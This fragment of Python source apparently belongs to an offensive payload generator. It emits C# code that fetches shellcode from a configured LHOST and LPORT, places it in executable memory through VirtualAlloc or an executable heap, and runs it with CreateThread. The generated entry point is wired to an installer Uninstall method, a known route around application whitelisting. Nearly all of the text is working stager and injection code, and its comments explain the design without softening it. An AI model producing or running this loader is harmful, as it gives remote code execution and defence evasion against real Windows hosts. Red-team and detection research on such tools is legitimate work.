        # 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE: an RWX private allocation,
        # which is a common telemetry point for endpoint monitoring
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, sName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (sName, funcAddrName, sName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        # the trailing "}}" closes both the if-block and the function
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        # pinfoName is reused here as the heap handle, not as a thread parameter;
        # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 = HEAP_ZERO_MEMORY
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        # "}}}}" is a .format escape for two literal braces: closes the if-block and the function
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
    # entry point called from Installer.Uninstall
    sName = bypass_helpers.randomString()  # rebound again: local buffer name in the entry point
    num_tabs_required = 0
    payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
    # senecas_games is defined elsewhere; presumably it emits wrapper constructs and reports
    # how many blocks it left open so they can be closed below -- verify against gamemaker
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 2
    # LHOST/LPORT are interpolated directly into the C# string literal (no escaping)
    payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payload_code += " %s(%s);\n" % (injectName, sName)
    # close every block still open: the entry point, the class and whatever senecas_games opened
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1
    self.payload_source_code = payload_code
    return